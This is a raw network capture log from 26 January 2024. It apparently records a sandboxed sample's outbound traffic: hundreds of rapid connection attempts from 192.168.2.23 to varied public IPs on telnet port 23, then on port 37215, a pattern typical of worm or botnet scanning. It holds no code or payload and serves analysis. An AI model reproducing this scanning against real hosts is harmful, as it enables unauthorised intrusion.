                                                            Jan 26, 2024 15:31:03.947257996 CET5872823192.168.2.23146.252.1.145
                                                            Jan 26, 2024 15:31:03.947257996 CET5872823192.168.2.23220.230.151.16
                                                            Jan 26, 2024 15:31:03.947258949 CET5872823192.168.2.23204.240.255.246
                                                            Jan 26, 2024 15:31:03.947267056 CET5872823192.168.2.239.68.76.30
                                                            Jan 26, 2024 15:31:03.947290897 CET5872823192.168.2.23126.229.82.92
                                                            Jan 26, 2024 15:31:03.947293997 CET5872823192.168.2.2320.66.179.59
                                                            Jan 26, 2024 15:31:03.947329998 CET5872823192.168.2.23164.199.225.20
                                                            Jan 26, 2024 15:31:03.947329998 CET5872823192.168.2.2398.156.249.7
                                                            Jan 26, 2024 15:31:03.947331905 CET5872823192.168.2.2392.156.59.168
                                                            Jan 26, 2024 15:31:03.947345018 CET5872823192.168.2.2337.223.236.27
                                                            Jan 26, 2024 15:31:03.947345972 CET5872823192.168.2.2370.217.119.44
                                                            Jan 26, 2024 15:31:03.947345018 CET5872823192.168.2.23183.134.3.219
                                                            Jan 26, 2024 15:31:03.947345972 CET5872823192.168.2.23223.0.232.125
                                                            Jan 26, 2024 15:31:03.947345018 CET5872823192.168.2.23135.128.219.221
                                                            Jan 26, 2024 15:31:03.947345972 CET5872823192.168.2.23210.58.227.194
                                                            Jan 26, 2024 15:31:03.947350979 CET5872823192.168.2.231.159.62.61
                                                            Jan 26, 2024 15:31:03.947352886 CET5872823192.168.2.2384.51.191.231
                                                            Jan 26, 2024 15:31:03.947352886 CET5872823192.168.2.23128.113.36.132
                                                            Jan 26, 2024 15:31:03.947350979 CET5872823192.168.2.23116.224.247.4
                                                            Jan 26, 2024 15:31:03.947360039 CET5872823192.168.2.23126.12.17.85
                                                            Jan 26, 2024 15:31:03.947366953 CET5872823192.168.2.23144.224.64.97
                                                            Jan 26, 2024 15:31:03.947374105 CET5872823192.168.2.23129.101.46.247
                                                            Jan 26, 2024 15:31:03.947380066 CET5872823192.168.2.2374.111.75.188
                                                            Jan 26, 2024 15:31:03.947386980 CET5872823192.168.2.2320.82.211.183
                                                            Jan 26, 2024 15:31:03.947386980 CET5872823192.168.2.2317.87.22.13
                                                            Jan 26, 2024 15:31:03.947386980 CET5872823192.168.2.2372.230.87.122
                                                            Jan 26, 2024 15:31:03.947386980 CET5872823192.168.2.23205.59.230.121
                                                            Jan 26, 2024 15:31:03.947390079 CET5872823192.168.2.231.72.219.146
                                                            Jan 26, 2024 15:31:03.947390079 CET5872823192.168.2.2377.57.59.216
                                                            Jan 26, 2024 15:31:03.947391033 CET5872823192.168.2.23144.122.248.135
                                                            Jan 26, 2024 15:31:03.947390079 CET5872823192.168.2.2396.22.65.70
                                                            Jan 26, 2024 15:31:03.947397947 CET5872823192.168.2.23212.177.199.46
                                                            Jan 26, 2024 15:31:03.947403908 CET5872823192.168.2.23194.89.227.232
                                                            Jan 26, 2024 15:31:03.947406054 CET5872823192.168.2.2392.121.20.47
                                                            Jan 26, 2024 15:31:03.947427988 CET5872823192.168.2.2381.37.56.235
                                                            Jan 26, 2024 15:31:03.947427988 CET5872823192.168.2.2399.149.142.113
                                                            Jan 26, 2024 15:31:03.947429895 CET5872823192.168.2.23121.123.12.86
                                                            Jan 26, 2024 15:31:03.947429895 CET5872823192.168.2.23148.141.95.129
                                                            Jan 26, 2024 15:31:03.947438955 CET5872823192.168.2.23200.1.199.68
                                                            Jan 26, 2024 15:31:03.947446108 CET5872823192.168.2.23173.141.209.75
                                                            Jan 26, 2024 15:31:03.947451115 CET5872823192.168.2.2353.33.17.154
                                                            Jan 26, 2024 15:31:03.947458982 CET5872823192.168.2.23210.87.226.63
                                                            Jan 26, 2024 15:31:03.947468996 CET5872823192.168.2.23155.138.155.24
                                                            Jan 26, 2024 15:31:03.947479010 CET5872823192.168.2.234.11.171.199
                                                            Jan 26, 2024 15:31:03.947480917 CET5872823192.168.2.2374.44.157.203
                                                            Jan 26, 2024 15:31:03.947483063 CET5872823192.168.2.23213.9.59.6
                                                            Jan 26, 2024 15:31:03.947483063 CET5872823192.168.2.234.159.180.200
                                                            Jan 26, 2024 15:31:03.947485924 CET5872823192.168.2.23112.23.232.119
                                                            Jan 26, 2024 15:31:03.947487116 CET5872823192.168.2.23175.130.122.85
                                                            Jan 26, 2024 15:31:03.947494030 CET5872823192.168.2.2394.231.116.231
                                                            Jan 26, 2024 15:31:03.947498083 CET5872823192.168.2.23120.26.83.63
                                                            Jan 26, 2024 15:31:03.947499990 CET5872823192.168.2.2382.163.33.167
                                                            Jan 26, 2024 15:31:03.947499990 CET5872823192.168.2.23206.189.66.171
                                                            Jan 26, 2024 15:31:03.947499990 CET5872823192.168.2.23145.35.88.67
                                                            Jan 26, 2024 15:31:03.947503090 CET5872823192.168.2.23163.12.42.202
                                                            Jan 26, 2024 15:31:03.947504997 CET5872823192.168.2.23169.10.243.215
                                                            Jan 26, 2024 15:31:03.947504997 CET5872823192.168.2.23104.207.38.104
                                                            Jan 26, 2024 15:31:03.947504997 CET5872823192.168.2.2386.228.205.17
                                                            Jan 26, 2024 15:31:03.947518110 CET5872823192.168.2.23112.77.77.51
                                                            Jan 26, 2024 15:31:03.947518110 CET5872823192.168.2.23170.208.9.148
                                                            Jan 26, 2024 15:31:03.947527885 CET5872823192.168.2.23198.76.180.229
                                                            Jan 26, 2024 15:31:03.947527885 CET5872823192.168.2.23181.192.144.33
                                                            Jan 26, 2024 15:31:03.947527885 CET5872823192.168.2.2373.181.172.56
                                                            Jan 26, 2024 15:31:03.947530031 CET5872823192.168.2.2342.24.147.98
                                                            Jan 26, 2024 15:31:03.947532892 CET5872823192.168.2.2363.200.224.82
                                                            Jan 26, 2024 15:31:03.947534084 CET5872823192.168.2.23145.9.73.203
                                                            Jan 26, 2024 15:31:03.947559118 CET5872823192.168.2.2314.13.83.213
                                                            Jan 26, 2024 15:31:03.947560072 CET5872823192.168.2.23197.47.104.87
                                                            Jan 26, 2024 15:31:03.947575092 CET5872823192.168.2.23222.77.197.31
                                                            Jan 26, 2024 15:31:03.947577000 CET5872823192.168.2.23100.220.211.60
                                                            Jan 26, 2024 15:31:03.947577000 CET5872823192.168.2.2380.101.231.64
                                                            Jan 26, 2024 15:31:03.947581053 CET5872823192.168.2.239.156.108.175
                                                            Jan 26, 2024 15:31:03.947581053 CET5872823192.168.2.2335.88.56.32
                                                            Jan 26, 2024 15:31:03.947581053 CET5872823192.168.2.23218.83.224.234
                                                            Jan 26, 2024 15:31:03.947596073 CET5872823192.168.2.23161.94.208.139
                                                            Jan 26, 2024 15:31:03.947596073 CET5872823192.168.2.2378.6.197.16
                                                            Jan 26, 2024 15:31:03.947603941 CET5872823192.168.2.2314.156.199.151
                                                            Jan 26, 2024 15:31:03.947603941 CET5872823192.168.2.23129.128.0.21
                                                            Jan 26, 2024 15:31:03.947603941 CET5872823192.168.2.23184.205.252.28
                                                            Jan 26, 2024 15:31:03.947604895 CET5872823192.168.2.23209.254.133.220
                                                            Jan 26, 2024 15:31:03.947606087 CET5872823192.168.2.239.230.214.237
                                                            Jan 26, 2024 15:31:03.947606087 CET5872823192.168.2.2360.130.146.118
                                                            Jan 26, 2024 15:31:03.947608948 CET5872823192.168.2.2369.53.191.213
                                                            Jan 26, 2024 15:31:03.947609901 CET5872823192.168.2.2347.127.238.233
                                                            Jan 26, 2024 15:31:03.947609901 CET5872823192.168.2.2368.190.244.195
                                                            Jan 26, 2024 15:31:03.947609901 CET5872823192.168.2.2398.41.46.87
                                                            Jan 26, 2024 15:31:03.947621107 CET5872823192.168.2.2395.176.99.220
                                                            Jan 26, 2024 15:31:03.947630882 CET5872823192.168.2.2351.127.36.250
                                                            Jan 26, 2024 15:31:03.947633028 CET5872823192.168.2.2331.228.166.58
                                                            Jan 26, 2024 15:31:03.947633028 CET5872823192.168.2.23165.38.175.121
                                                            Jan 26, 2024 15:31:03.947633028 CET5872823192.168.2.23169.12.221.177
                                                            Jan 26, 2024 15:31:03.947633982 CET5872823192.168.2.23126.137.174.223
                                                            Jan 26, 2024 15:31:03.947633982 CET5872823192.168.2.23209.75.83.3
                                                            Jan 26, 2024 15:31:03.947634935 CET5872823192.168.2.2354.98.32.6
                                                            Jan 26, 2024 15:31:03.947633982 CET5872823192.168.2.23144.122.103.136
                                                            Jan 26, 2024 15:31:03.947634935 CET5872823192.168.2.23193.108.107.147
                                                            Jan 26, 2024 15:31:03.947633982 CET5872823192.168.2.23216.182.252.28
                                                            Jan 26, 2024 15:31:03.947635889 CET5872823192.168.2.23189.202.43.215
                                                            Jan 26, 2024 15:31:03.947634935 CET5872823192.168.2.23164.168.113.53
                                                            Jan 26, 2024 15:31:03.947635889 CET5872823192.168.2.2380.186.92.156
                                                            Jan 26, 2024 15:31:03.947638035 CET5872823192.168.2.23197.25.144.49
                                                            Jan 26, 2024 15:31:03.947635889 CET5872823192.168.2.23196.161.226.105
                                                            Jan 26, 2024 15:31:03.947638035 CET5872823192.168.2.23114.252.79.104
                                                            Jan 26, 2024 15:31:03.947638035 CET5872823192.168.2.2319.230.236.8
                                                            Jan 26, 2024 15:31:03.947647095 CET5872823192.168.2.2395.76.100.154
                                                            Jan 26, 2024 15:31:03.947647095 CET5872823192.168.2.23100.203.234.1
                                                            Jan 26, 2024 15:31:03.947649956 CET5872823192.168.2.23105.246.121.115
                                                            Jan 26, 2024 15:31:03.947647095 CET5872823192.168.2.23216.50.77.80
                                                            Jan 26, 2024 15:31:03.947649956 CET5872823192.168.2.2384.116.47.64
                                                            Jan 26, 2024 15:31:03.947647095 CET5872823192.168.2.2386.26.107.91
                                                            Jan 26, 2024 15:31:03.947647095 CET5872823192.168.2.2382.111.230.104
                                                            Jan 26, 2024 15:31:03.947659016 CET5872823192.168.2.23138.158.57.5
                                                            Jan 26, 2024 15:31:03.947659016 CET5872823192.168.2.23162.174.155.154
                                                            Jan 26, 2024 15:31:03.947660923 CET5872823192.168.2.23134.88.221.131
                                                            Jan 26, 2024 15:31:03.947674036 CET5872823192.168.2.23129.156.18.51
                                                            Jan 26, 2024 15:31:03.947674036 CET5872823192.168.2.2377.65.207.149
                                                            Jan 26, 2024 15:31:03.947679043 CET5872823192.168.2.23171.47.178.96
                                                            Jan 26, 2024 15:31:03.947680950 CET5872823192.168.2.2346.91.105.114
                                                            Jan 26, 2024 15:31:03.947698116 CET5872823192.168.2.235.10.240.236
                                                            Jan 26, 2024 15:31:03.947701931 CET5872823192.168.2.2362.150.232.248
                                                            Jan 26, 2024 15:31:03.947710991 CET5872823192.168.2.23110.42.104.118
                                                            Jan 26, 2024 15:31:03.947715998 CET5872823192.168.2.2349.144.152.224
                                                            Jan 26, 2024 15:31:03.947715998 CET5872823192.168.2.23204.166.222.199
                                                            Jan 26, 2024 15:31:03.947715998 CET5872823192.168.2.23193.169.83.225
                                                            Jan 26, 2024 15:31:03.947716951 CET5872823192.168.2.2323.178.1.121
                                                            Jan 26, 2024 15:31:03.947720051 CET5872823192.168.2.23188.1.2.80
                                                            Jan 26, 2024 15:31:03.947720051 CET5872823192.168.2.2348.5.12.127
                                                            Jan 26, 2024 15:31:03.947720051 CET5872823192.168.2.23113.205.132.64
                                                            Jan 26, 2024 15:31:03.947726011 CET5872823192.168.2.2323.153.35.133
                                                            Jan 26, 2024 15:31:03.947726011 CET5872823192.168.2.2373.42.119.251
                                                            Jan 26, 2024 15:31:03.947726011 CET5872823192.168.2.23162.47.243.85
                                                            Jan 26, 2024 15:31:03.947729111 CET5872823192.168.2.2350.242.179.168
                                                            Jan 26, 2024 15:31:03.947726011 CET5872823192.168.2.23202.181.233.248
                                                            Jan 26, 2024 15:31:03.947731018 CET5872823192.168.2.23169.237.6.224
                                                            Jan 26, 2024 15:31:03.947726011 CET5872823192.168.2.23132.147.5.110
                                                            Jan 26, 2024 15:31:03.947726011 CET5872823192.168.2.23167.207.198.39
                                                            Jan 26, 2024 15:31:03.947726011 CET5872823192.168.2.23138.12.105.223
                                                            Jan 26, 2024 15:31:03.947726965 CET5872823192.168.2.2390.121.5.180
                                                            Jan 26, 2024 15:31:03.947735071 CET5872823192.168.2.2353.188.116.165
                                                            Jan 26, 2024 15:31:03.947738886 CET5872823192.168.2.23148.167.91.18
                                                            Jan 26, 2024 15:31:03.947746038 CET5872823192.168.2.23137.220.136.250
                                                            Jan 26, 2024 15:31:03.947757959 CET5872823192.168.2.2332.247.173.174
                                                            Jan 26, 2024 15:31:03.947767019 CET5872823192.168.2.2325.20.120.38
                                                            Jan 26, 2024 15:31:03.947767019 CET5872823192.168.2.23121.90.158.67
                                                            Jan 26, 2024 15:31:03.947770119 CET5872823192.168.2.23115.154.59.200
                                                            Jan 26, 2024 15:31:03.947771072 CET5872823192.168.2.23131.249.137.126
                                                            Jan 26, 2024 15:31:03.947771072 CET5872823192.168.2.23106.82.213.217
                                                            Jan 26, 2024 15:31:03.947777033 CET5872823192.168.2.23126.94.215.88
                                                            Jan 26, 2024 15:31:03.947783947 CET5872823192.168.2.23130.26.52.128
                                                            Jan 26, 2024 15:31:03.947784901 CET5872823192.168.2.2367.213.56.59
                                                            Jan 26, 2024 15:31:03.947784901 CET5872823192.168.2.23126.41.255.142
                                                            Jan 26, 2024 15:31:03.947792053 CET5872823192.168.2.23176.43.206.200
                                                            Jan 26, 2024 15:31:03.947804928 CET5872823192.168.2.2394.142.92.207
                                                            Jan 26, 2024 15:31:03.947807074 CET5872823192.168.2.232.90.181.25
                                                            Jan 26, 2024 15:31:03.947820902 CET5872823192.168.2.2390.207.90.105
                                                            Jan 26, 2024 15:31:03.947820902 CET5872823192.168.2.23222.188.138.136
                                                            Jan 26, 2024 15:31:03.947823048 CET5872823192.168.2.23141.149.101.127
                                                            Jan 26, 2024 15:31:03.947841883 CET5872823192.168.2.23209.119.158.8
                                                            Jan 26, 2024 15:31:03.947849989 CET5872823192.168.2.23221.241.163.129
                                                            Jan 26, 2024 15:31:03.947849989 CET5872823192.168.2.23134.33.254.138
                                                            Jan 26, 2024 15:31:03.947854042 CET5872823192.168.2.23176.101.103.225
                                                            Jan 26, 2024 15:31:03.947856903 CET5872823192.168.2.23203.92.40.46
                                                            Jan 26, 2024 15:31:03.947856903 CET5872823192.168.2.2372.87.206.11
                                                            Jan 26, 2024 15:31:03.947880983 CET5872823192.168.2.23221.113.176.17
                                                            Jan 26, 2024 15:31:03.947887897 CET5872823192.168.2.23144.48.132.91
                                                            Jan 26, 2024 15:31:03.947890997 CET5872823192.168.2.23122.38.9.107
                                                            Jan 26, 2024 15:31:03.947890997 CET5872823192.168.2.234.103.100.121
                                                            Jan 26, 2024 15:31:03.947896004 CET5872823192.168.2.2399.94.33.214
                                                            Jan 26, 2024 15:31:03.947906971 CET5872823192.168.2.23189.100.171.33
                                                            Jan 26, 2024 15:31:03.947906971 CET5872823192.168.2.2348.97.199.197
                                                            Jan 26, 2024 15:31:03.947921038 CET5872823192.168.2.23165.96.10.175
                                                            Jan 26, 2024 15:31:03.947932959 CET5872823192.168.2.2346.247.254.221
                                                            Jan 26, 2024 15:31:03.947936058 CET5872823192.168.2.23148.4.189.196
                                                            Jan 26, 2024 15:31:03.947941065 CET5872823192.168.2.23175.170.123.19
                                                            Jan 26, 2024 15:31:03.947959900 CET5872823192.168.2.23151.100.185.87
                                                            Jan 26, 2024 15:31:03.947961092 CET5872823192.168.2.23135.186.233.173
                                                            Jan 26, 2024 15:31:03.947981119 CET5872823192.168.2.23122.81.226.225
                                                            Jan 26, 2024 15:31:03.947981119 CET5872823192.168.2.2388.36.75.40
                                                            Jan 26, 2024 15:31:03.947997093 CET5872823192.168.2.2325.181.203.119
                                                            Jan 26, 2024 15:31:03.947998047 CET5872823192.168.2.23104.252.36.207
                                                            Jan 26, 2024 15:31:03.948009014 CET5872823192.168.2.2327.248.84.235
                                                            Jan 26, 2024 15:31:03.948009968 CET5872823192.168.2.2366.33.226.122
                                                            Jan 26, 2024 15:31:03.948020935 CET5872823192.168.2.23218.252.105.137
                                                            Jan 26, 2024 15:31:03.948024988 CET5872823192.168.2.2350.15.138.191
                                                            Jan 26, 2024 15:31:03.948024988 CET5872823192.168.2.23149.21.24.191
                                                            Jan 26, 2024 15:31:03.948026896 CET5872823192.168.2.2325.9.158.169
                                                            Jan 26, 2024 15:31:03.948035955 CET5872823192.168.2.2358.30.59.213
                                                            Jan 26, 2024 15:31:03.948036909 CET5872823192.168.2.23194.128.194.220
                                                            Jan 26, 2024 15:31:03.948046923 CET5872823192.168.2.23111.180.104.136
                                                            Jan 26, 2024 15:31:03.948054075 CET5872823192.168.2.23110.171.144.161
                                                            Jan 26, 2024 15:31:03.948061943 CET5872823192.168.2.2335.103.2.226
                                                            Jan 26, 2024 15:31:03.948071957 CET5872823192.168.2.23201.151.149.50
                                                            Jan 26, 2024 15:31:03.948076010 CET5872823192.168.2.23161.50.157.23
                                                            Jan 26, 2024 15:31:03.948081970 CET5872823192.168.2.23186.187.198.1
                                                            Jan 26, 2024 15:31:03.948091030 CET5872823192.168.2.23178.146.252.194
                                                            Jan 26, 2024 15:31:03.948106050 CET5872823192.168.2.2345.6.4.57
                                                            Jan 26, 2024 15:31:03.948110104 CET5872823192.168.2.23223.63.71.243
                                                            Jan 26, 2024 15:31:03.948165894 CET5872823192.168.2.23178.198.180.166
                                                            Jan 26, 2024 15:31:03.948170900 CET5872823192.168.2.2341.83.142.183
                                                            Jan 26, 2024 15:31:03.948188066 CET5872823192.168.2.2323.213.200.255
                                                            Jan 26, 2024 15:31:03.948194027 CET5872823192.168.2.23168.108.235.132
                                                            Jan 26, 2024 15:31:03.948199034 CET5872823192.168.2.23158.246.210.0
                                                            Jan 26, 2024 15:31:03.948209047 CET5872823192.168.2.2318.53.34.4
                                                            Jan 26, 2024 15:31:03.948213100 CET5872823192.168.2.234.152.130.57
                                                            Jan 26, 2024 15:31:03.948219061 CET5872823192.168.2.2391.216.251.233
                                                            Jan 26, 2024 15:31:03.948224068 CET5872823192.168.2.23210.145.64.46
                                                            Jan 26, 2024 15:31:03.948236942 CET5872823192.168.2.23218.142.210.92
                                                            Jan 26, 2024 15:31:03.948240042 CET5872823192.168.2.2357.208.154.97
                                                            Jan 26, 2024 15:31:03.948251009 CET5872823192.168.2.2336.70.99.201
                                                            Jan 26, 2024 15:31:03.948256969 CET5872823192.168.2.23208.166.190.197
                                                            Jan 26, 2024 15:31:03.948266029 CET5872823192.168.2.23178.82.134.237
                                                            Jan 26, 2024 15:31:03.948266983 CET5872823192.168.2.2392.212.228.98
                                                            Jan 26, 2024 15:31:03.948280096 CET5872823192.168.2.23208.233.94.65
                                                            Jan 26, 2024 15:31:03.948282003 CET5872823192.168.2.23205.208.11.0
                                                            Jan 26, 2024 15:31:03.959346056 CET5898437215192.168.2.23197.224.141.99
                                                            Jan 26, 2024 15:31:03.959347010 CET5898437215192.168.2.23197.192.234.102
                                                            Jan 26, 2024 15:31:03.959361076 CET5898437215192.168.2.23197.201.185.75
                                                            Jan 26, 2024 15:31:03.959362030 CET5898437215192.168.2.2341.209.16.189
                                                            Jan 26, 2024 15:31:03.959366083 CET5898437215192.168.2.2341.95.105.74
                                                            Jan 26, 2024 15:31:03.959378958 CET5898437215192.168.2.23197.232.194.164
                                                            Jan 26, 2024 15:31:03.959378958 CET5898437215192.168.2.23156.162.1.210
                                                            Jan 26, 2024 15:31:03.959389925 CET5898437215192.168.2.2341.180.241.240
                                                            Jan 26, 2024 15:31:03.959392071 CET5898437215192.168.2.23156.115.54.138
                                                            Jan 26, 2024 15:31:03.959403038 CET5898437215192.168.2.23197.173.235.148
                                                            Jan 26, 2024 15:31:03.959402084 CET5898437215192.168.2.23156.16.82.102
                                                            Jan 26, 2024 15:31:03.959414005 CET5898437215192.168.2.2341.55.61.24
                                                            Jan 26, 2024 15:31:03.959422112 CET5898437215192.168.2.23156.159.25.148
                                                            Jan 26, 2024 15:31:03.959431887 CET5898437215192.168.2.23156.113.169.204
                                                            Jan 26, 2024 15:31:03.959434986 CET5898437215192.168.2.23156.86.47.10
                                                            Jan 26, 2024 15:31:03.959434986 CET5898437215192.168.2.23156.55.227.137
                                                            Jan 26, 2024 15:31:03.959445953 CET5898437215192.168.2.23197.187.181.177
                                                            Jan 26, 2024 15:31:03.959446907 CET5898437215192.168.2.2341.125.240.238
                                                            Jan 26, 2024 15:31:03.959456921 CET5898437215192.168.2.2341.243.81.111
                                                            Jan 26, 2024 15:31:03.959466934 CET5898437215192.168.2.23197.114.104.134
                                                            Jan 26, 2024 15:31:03.959479094 CET5898437215192.168.2.2341.144.18.121
                                                            Jan 26, 2024 15:31:03.959482908 CET5898437215192.168.2.23197.213.247.140
                                                            Jan 26, 2024 15:31:03.959511995 CET5898437215192.168.2.23156.14.91.14
                                                            Jan 26, 2024 15:31:03.959517002 CET5898437215192.168.2.23156.216.182.52
                                                            Jan 26, 2024 15:31:03.959516048 CET5898437215192.168.2.23197.91.51.248
                                                            Jan 26, 2024 15:31:03.959517956 CET5898437215192.168.2.23156.127.111.213
                                                            Jan 26, 2024 15:31:03.959530115 CET5898437215192.168.2.2341.21.69.37
                                                            Jan 26, 2024 15:31:03.959531069 CET5898437215192.168.2.23156.23.197.1
                                                            Jan 26, 2024 15:31:03.959532976 CET5898437215192.168.2.2341.20.134.73
                                                            Jan 26, 2024 15:31:03.959532976 CET5898437215192.168.2.2341.13.119.194
                                                            Jan 26, 2024 15:31:03.959534883 CET5898437215192.168.2.23156.182.246.116
                                                            Jan 26, 2024 15:31:03.959534883 CET5898437215192.168.2.23197.80.83.205
                                                            Jan 26, 2024 15:31:03.959534883 CET5898437215192.168.2.23197.201.173.12
                                                            Jan 26, 2024 15:31:03.959537029 CET5898437215192.168.2.23197.197.44.7
                                                            Jan 26, 2024 15:31:03.959542036 CET5898437215192.168.2.23197.252.159.46
                                                            Jan 26, 2024 15:31:03.959542036 CET5898437215192.168.2.23156.34.162.127
                                                            Jan 26, 2024 15:31:03.959547997 CET5898437215192.168.2.23197.248.45.23
                                                            Jan 26, 2024 15:31:03.959549904 CET5898437215192.168.2.2341.37.111.228
                                                            Jan 26, 2024 15:31:03.959547997 CET5898437215192.168.2.23197.76.25.26
                                                            Jan 26, 2024 15:31:03.959549904 CET5898437215192.168.2.23197.3.34.243
                                                            Jan 26, 2024 15:31:03.959542036 CET5898437215192.168.2.2341.88.200.93
                                                            Jan 26, 2024 15:31:03.959542036 CET5898437215192.168.2.23197.126.215.191
                                                            Jan 26, 2024 15:31:03.959554911 CET5898437215192.168.2.23156.14.242.31
                                                            Jan 26, 2024 15:31:03.959554911 CET5898437215192.168.2.23156.210.43.163
                                                            Jan 26, 2024 15:31:03.959562063 CET5898437215192.168.2.23197.166.238.8
                                                            Jan 26, 2024 15:31:03.959569931 CET5898437215192.168.2.23197.245.12.239
                                                            Jan 26, 2024 15:31:03.959579945 CET5898437215192.168.2.23156.243.87.187
                                                            Jan 26, 2024 15:31:03.959579945 CET5898437215192.168.2.23197.85.70.118
                                                            Jan 26, 2024 15:31:03.959599018 CET5898437215192.168.2.23156.139.219.173
                                                            Jan 26, 2024 15:31:03.959604979 CET5898437215192.168.2.2341.129.149.3
                                                            Jan 26, 2024 15:31:03.959609032 CET5898437215192.168.2.23197.118.116.0
                                                            Jan 26, 2024 15:31:03.959619999 CET5898437215192.168.2.2341.130.51.240
                                                            Jan 26, 2024 15:31:03.959624052 CET5898437215192.168.2.23156.150.207.216
                                                            Jan 26, 2024 15:31:03.959638119 CET5898437215192.168.2.23197.62.85.47
                                                            Jan 26, 2024 15:31:03.959656000 CET5898437215192.168.2.23156.206.245.184
                                                            Jan 26, 2024 15:31:03.959656000 CET5898437215192.168.2.2341.230.251.60
                                                            Jan 26, 2024 15:31:03.959670067 CET5898437215192.168.2.2341.148.1.240
                                                            Jan 26, 2024 15:31:03.959670067 CET5898437215192.168.2.23197.162.28.101
                                                            Jan 26, 2024 15:31:03.959671021 CET5898437215192.168.2.23197.87.159.155
                                                            Jan 26, 2024 15:31:03.959671021 CET5898437215192.168.2.2341.78.44.68
                                                            Jan 26, 2024 15:31:03.959671021 CET5898437215192.168.2.23156.67.125.240
                                                            Jan 26, 2024 15:31:03.959671021 CET5898437215192.168.2.2341.51.210.158
                                                            Jan 26, 2024 15:31:03.959680080 CET5898437215192.168.2.2341.99.118.241
                                                            Jan 26, 2024 15:31:03.959685087 CET5898437215192.168.2.23197.115.18.115
                                                            Jan 26, 2024 15:31:03.959721088 CET5898437215192.168.2.23197.88.176.225
                                                            Jan 26, 2024 15:31:03.959727049 CET5898437215192.168.2.23156.106.139.206
                                                            Jan 26, 2024 15:31:03.959752083 CET5898437215192.168.2.23197.56.109.108
                                                            Jan 26, 2024 15:31:03.959753990 CET5898437215192.168.2.23156.246.184.93
                                                            Jan 26, 2024 15:31:03.959753990 CET5898437215192.168.2.2341.233.5.71
                                                            Jan 26, 2024 15:31:03.959753990 CET5898437215192.168.2.23197.144.167.202
                                                            Jan 26, 2024 15:31:03.959754944 CET5898437215192.168.2.23156.14.195.1
                                                            Jan 26, 2024 15:31:03.959754944 CET5898437215192.168.2.2341.14.100.187
                                                            Jan 26, 2024 15:31:03.959764004 CET5898437215192.168.2.23156.55.84.59
                                                            Jan 26, 2024 15:31:03.959772110 CET5898437215192.168.2.23197.40.204.105
                                                            Jan 26, 2024 15:31:03.959784031 CET5898437215192.168.2.23197.233.203.142
                                                            Jan 26, 2024 15:31:03.959788084 CET5898437215192.168.2.23197.103.80.147
                                                            Jan 26, 2024 15:31:03.959788084 CET5898437215192.168.2.23156.9.193.161
                                                            Jan 26, 2024 15:31:03.959794998 CET5898437215192.168.2.23197.184.15.189
                                                            Jan 26, 2024 15:31:03.959810972 CET5898437215192.168.2.23156.20.75.242
                                                            Jan 26, 2024 15:31:03.959815979 CET5898437215192.168.2.23197.143.186.146
                                                            Jan 26, 2024 15:31:03.959815979 CET5898437215192.168.2.2341.53.39.23
                                                            Jan 26, 2024 15:31:03.959820032 CET5898437215192.168.2.2341.100.158.87
                                                            Jan 26, 2024 15:31:03.959825993 CET5898437215192.168.2.23156.104.191.195
                                                            Jan 26, 2024 15:31:03.959832907 CET5898437215192.168.2.2341.173.34.172
                                                            Jan 26, 2024 15:31:03.959836960 CET5898437215192.168.2.2341.8.156.163
                                                            Jan 26, 2024 15:31:03.959849119 CET5898437215192.168.2.23197.118.82.186
                                                            Jan 26, 2024 15:31:03.959856033 CET5898437215192.168.2.2341.50.2.117
                                                            Jan 26, 2024 15:31:03.959871054 CET5898437215192.168.2.23156.141.107.103
                                                            Jan 26, 2024 15:31:03.959876060 CET5898437215192.168.2.23156.19.152.239
                                                            Jan 26, 2024 15:31:03.959886074 CET5898437215192.168.2.2341.128.181.22
                                                            Jan 26, 2024 15:31:03.959887981 CET5898437215192.168.2.23156.180.186.202
                                                            Jan 26, 2024 15:31:03.959907055 CET5898437215192.168.2.23156.65.87.96
                                                            Jan 26, 2024 15:31:03.959908009 CET5898437215192.168.2.2341.61.178.230
                                                            Jan 26, 2024 15:31:03.959908009 CET5898437215192.168.2.23197.156.215.147
                                                            Jan 26, 2024 15:31:03.959913969 CET5898437215192.168.2.2341.136.154.202
                                                            Jan 26, 2024 15:31:03.959929943 CET5898437215192.168.2.23197.147.8.194
                                                            Jan 26, 2024 15:31:03.959942102 CET5898437215192.168.2.23156.160.88.171
                                                            Jan 26, 2024 15:31:03.959944963 CET5898437215192.168.2.23197.82.110.155
                                                            Jan 26, 2024 15:31:03.959948063 CET5898437215192.168.2.2341.78.121.159
                                                            Jan 26, 2024 15:31:03.959968090 CET5898437215192.168.2.23156.199.116.131
                                                            Jan 26, 2024 15:31:03.959969997 CET5898437215192.168.2.2341.185.163.240
                                                            Jan 26, 2024 15:31:03.959973097 CET5898437215192.168.2.23156.197.192.72
                                                            Jan 26, 2024 15:31:03.959995031 CET5898437215192.168.2.23156.128.170.44
                                                            Jan 26, 2024 15:31:03.960001945 CET5898437215192.168.2.2341.124.165.11
                                                            Jan 26, 2024 15:31:03.960001945 CET5898437215192.168.2.2341.165.29.217
                                                            Jan 26, 2024 15:31:03.960005045 CET5898437215192.168.2.23156.124.71.225
                                                            Jan 26, 2024 15:31:03.960005999 CET5898437215192.168.2.2341.4.65.41
                                                            Jan 26, 2024 15:31:03.960006952 CET5898437215192.168.2.23197.207.48.108
                                                            Jan 26, 2024 15:31:03.960006952 CET5898437215192.168.2.23197.161.176.52
                                                            Jan 26, 2024 15:31:03.960009098 CET5898437215192.168.2.23197.248.252.57
                                                            Jan 26, 2024 15:31:03.960009098 CET5898437215192.168.2.23156.176.7.9
                                                            Jan 26, 2024 15:31:03.960011959 CET5898437215192.168.2.2341.25.34.63
                                                            Jan 26, 2024 15:31:03.960012913 CET5898437215192.168.2.2341.106.105.203
                                                            Jan 26, 2024 15:31:03.960037947 CET5898437215192.168.2.2341.195.205.169
                                                            Jan 26, 2024 15:31:03.960042000 CET5898437215192.168.2.2341.30.177.249
                                                            Jan 26, 2024 15:31:03.960043907 CET5898437215192.168.2.23156.223.183.167
                                                            Jan 26, 2024 15:31:03.960048914 CET5898437215192.168.2.23156.32.86.15
                                                            Jan 26, 2024 15:31:03.960056067 CET5898437215192.168.2.23156.82.117.137
                                                            Jan 26, 2024 15:31:03.960072994 CET5898437215192.168.2.23197.118.50.247
                                                            Jan 26, 2024 15:31:03.960076094 CET5898437215192.168.2.23156.216.25.76
                                                            Jan 26, 2024 15:31:03.960076094 CET5898437215192.168.2.23197.110.228.46
                                                            Jan 26, 2024 15:31:03.960084915 CET5898437215192.168.2.23197.199.203.251
                                                            Jan 26, 2024 15:31:03.960103989 CET5898437215192.168.2.2341.88.207.10
                                                            Jan 26, 2024 15:31:03.960104942 CET5898437215192.168.2.23197.175.13.44
